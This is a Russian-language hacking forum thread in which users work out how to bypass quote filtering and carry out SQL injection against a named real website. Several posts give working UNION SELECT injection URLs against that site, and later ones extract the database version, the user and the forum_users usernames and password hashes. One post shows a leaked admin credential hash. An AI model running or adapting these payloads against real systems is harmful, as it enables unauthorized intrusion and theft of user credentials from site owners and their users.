![]() |
Обход фильтрации спецсимволов
Интересует вопрос каким образом можно обойти фильтрацию кроме char в mysql. имеется сайт при запросе ...?root=2' фильтрует кавычку и пережд ней ставит слэш. каким образом возможно это обойти?
|
Никаким.
|
ХМ , только одни кавычки фильтрует???:D
|
все кавычки... просто если взять root=1=union+select+1,2,3,4,5,6,7,8/* тогда таблы подбираются и сообщение об ошибке уходит. но в поле ни где не отображает символов. Тобишь куда команды воодить :p пытался кавычку влепить и все... :confused:
|
а root=-1+union+select+1,2,3,4,5,6,7,8/* не пробовал?
на крайняк root=1+and+1=0+union+select+1,2,3,4,5,6,7,8/* |
>> на крайняк root=1+and+1=0+union+select+1,2,3,4,5,6,7,8/*
Что значит на крайняк? :d |
Цитата:
вообще код кавычки вроде %22 или %27 попробуй) |
>> вообще код кавычки вроде %22 или %27
попробуй) Хватит пороть херню. magic_quotes_gpc вы не обойдёте. |
Зачем тебе при вводе команд кавычка?
|
Цитата:
|
судя по четвертому посту значение переменной не обрамляется ковычками => пост Ламоза
|
какой то сайтег хитрожопый....
root=-1+union+select+1,2,3,4,5,6,7,8/* пробовал... он отображает коррекно главную страницу. но не показывает поля в которые вводить команды version() (в чем проблема?) и т.д. + не /* а -- вводить нужно. в первом случае отображает ошибку. root=1+and+1=0+union+select+1,2,3,4,5,6,7,8 -- так же отображает корректно. %27 он заменяет на кавычку и опять такая трабла. |
Думается мне что скуль слепая. Может выложишь нормальную ссылку на сайт?
PS /Ушёл спать, так что пусть другие напишут что то типа or ascii(substring(blablabla))) ... |
http://www.bastaone.com./?root=99999+union+select+1,2,3,4,5,6,7,8 --
|
http://www.bastaone.com/?root=99999%2B
http://www.bastaone.com./?root=99999/**/union/**/select/**/1,2,3,version(),5,6,7,8-- |
o_O у тебя на этих ссылках отображает версию? http://www.bastaone.com./?root=99999/**/union/**/select/**/1,2,3,version(),5,6,7,8-- опять корректно отображенная страница без версии базы. че за х ваще? объясните почему так. или дайте ссылко на объяснение...
|
Не там копали хех -)
http://www.bastaone.com/?root=5&page=64+union+select+1,2,3,4,version(),6,u ser(),8,9,10,11,12,13,14,15--&inner=1 -) Бедный бастер фанаты замучают.... |
Цитата:
Код:
5 admin:730e422673f0105793eede5fb1c42b65 |
хм... ясно. Но вопрос. почему так и что за параметр inner=1. Дайте ссылку на источник или объясните пожалуйста что это и когда используется?
|
Да ниче он не значит ты введи в адрессной строке:
http://www.bastaone.com/?root=5&page=64+union+sele%27ct+1,2,3,4,5,6,concat (username,ch%27ar(58),user_password),8,9,10,11,12, 13,14,15+from+forum_users-- Тебе тоже самое выдаст. Я вообще не знаю для чего его здесь влепили. Этот параметр (переменная) нужен самому серваку, а точнее PHP-скрипту для выдачи определенного текста или страницы. Допустим есть PHP-скрипт index.php с кодом: Код:
<?phpНадеюсь доходчиво объяснил... |
Все. Поянл. Спасибо за помощь. ))) Бедный сайт басты... ;( ему ж ппц...
|
| Время: 20:53 |